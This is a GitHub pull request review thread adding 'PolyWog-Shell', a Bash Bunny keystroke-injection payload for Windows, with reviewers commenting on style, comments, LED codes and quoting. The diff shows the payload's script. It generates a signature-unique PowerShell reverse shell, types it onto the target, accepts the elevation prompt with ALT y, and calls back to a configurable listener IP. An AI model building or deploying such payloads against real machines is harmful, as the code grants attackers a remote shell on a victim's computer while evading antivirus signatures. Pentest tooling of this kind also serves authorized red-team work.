Adding new execution payload. #695
Conversation
| # Title: PolyWog-Shell | ||
| # Author: Hak5Peaks | ||
| # Catagory: Exacuation | ||
| # Description: This payload uses a python2 + Bash script to generate a signature unique powershell rev shell that is typed out on the target PC. |
There was a problem hiding this comment.
"is typed out"
"using keystroke injection"
| # Target: Windows | ||
| #################### | ||
|
|
||
| # PLEASE READ THE CONFIGUATION REQUIRMENTS INSIDE THE GITHUB REPO BEFORE RUNNING SCRIPT. |
There was a problem hiding this comment.
the bare minimum configuration requirements should ideally be within the comments of the payload -- payloads are meant to be portable and self containing remember
| Q DELAY 1000 #Waiting for PC to recongize bunny. | ||
|
|
||
| #rev shell call back configuation options. | ||
| IP="192.168.0.0" #Change this to IP on ncat listen |
There was a problem hiding this comment.
Configuration options should be at the top of a payload so they are not missed by end user
| Q STRING $SHELL # type out generated reverse shell. | ||
| Q DELAY 500 | ||
| Q ENTER | ||
| LED G # indicate payload is done. |
There was a problem hiding this comment.
pick a consistent comment style
# comment
#comment
# Comment
#Comment
any style is fine but at least keep it clean by being consistent ;)
| # PLEASE READ THE CONFIGUATION REQUIRMENTS INSIDE THE GITHUB REPO BEFORE RUNNING SCRIPT. | ||
|
|
||
| ATTACKMODE HID | ||
| LED B # indicate payload started |
There was a problem hiding this comment.
Consider using
LED ATTACK
LED SETUP
LED CLEANUP
LED FINISH
throughout payload as these are standardized color wise
| cd .. | ||
| cd $SHELL_PY_DIR | ||
| python shell.py $IP $PORT #pass IP and port as arg in python generator script. | ||
| SHELL=$(cat shell.txt) # set output as global variable to avoid having to add escapes. |
There was a problem hiding this comment.
this should probably be quoted for safety(?)
or maybe I just write paranoid bash
SHELL="$(cat shell.txt)"
| Q DELAY 1000 | ||
| Q ALT y #accept permission prompt | ||
| Q DELAY 2000 | ||
| Q STRING $SHELL # type out generated reverse shell. |
There was a problem hiding this comment.
this might also be worth quoting
|
|
||
| ## PolyWog Shell Description. | ||
|
|
||
| Poly shell is a reverse shell generator designed for the Bash Bunny. This payload uses a python2 + bash script to generate a powershell payload with a unique signature. Every time the bash bunny is plugged into a computer, a unique powershell script will be injected into the target machine. |
There was a problem hiding this comment.
Poly shell
is it Poly shell or is it PolyWog shell? :P
There was a problem hiding this comment.
"Bash Bunny" not "bash bunny"
|
|
||
| ## Requirements. | ||
|
|
||
| Ensure correct configuation as stated above. There is `no` other requirments or external packages that need to be install. |
There was a problem hiding this comment.
make sure to comment somewhere if you have an SD card installed on the bunny, and if so the proper procedure for loading the payload onto the bunny in either case
Fixing **words** , LEDs and adding quotes
adding instructions for SD
adding comments and docs
This payload utilizes the Bash bunny to generate and then deliver unique Powershell payloads to target machine.
Read readme.md for more.